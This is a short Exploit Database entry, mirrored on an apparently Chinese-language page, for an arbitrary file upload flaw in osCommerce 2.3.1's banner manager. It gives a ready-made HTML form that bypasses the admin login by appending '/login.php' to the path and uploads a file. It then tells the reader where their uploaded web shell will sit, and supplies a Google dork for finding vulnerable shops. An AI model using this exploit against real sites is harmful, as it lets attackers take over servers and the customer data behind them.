osCommerce 2.3.1 – ‘banner_manager.php’ Arbitrary File Upload

• Exploit Database
• 41 阅读

• 作者： Number 7
  日期： 2011-05-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17285/

• # Exploit Title: [OSC 2.3.1: Remote File Upload Vulnerability : Banner Manager]
  # Google Dork: [powered by oscommerce](we will automatically add these to the GHDB)
  # Date: [13-05-2011]
  # Author: [Number 7]
  # Software Link: [http://www.oscommerce.com/ext/oscommerce-2.3.1.zip]
  # Version: [2.3.1]
  # Tested on: [Linux-apache-win03-mac Os .... ]
  # CVE : [if exists]
  _______________________________________________________________________________________
  
  <form name="new_banner" action="http://site/path/admin/banner_manager.php/login.php?action=insert" method="post" enctype="multipart/form-data"><br>
  <input type="file" name="banners_image"><br>
  <input name="submit" value=" Save " type="submit"></form>
  
  you will find your shell in
  
  http://site/path/images/yourshell.php
  
  _______________________________________________________________________________________
  Greetz: Ares-xGeek-allen-s man-SWAT-SPAM-TN // Tn-Hackers
  Site: Top-sec.com/vb // arhack.net/vb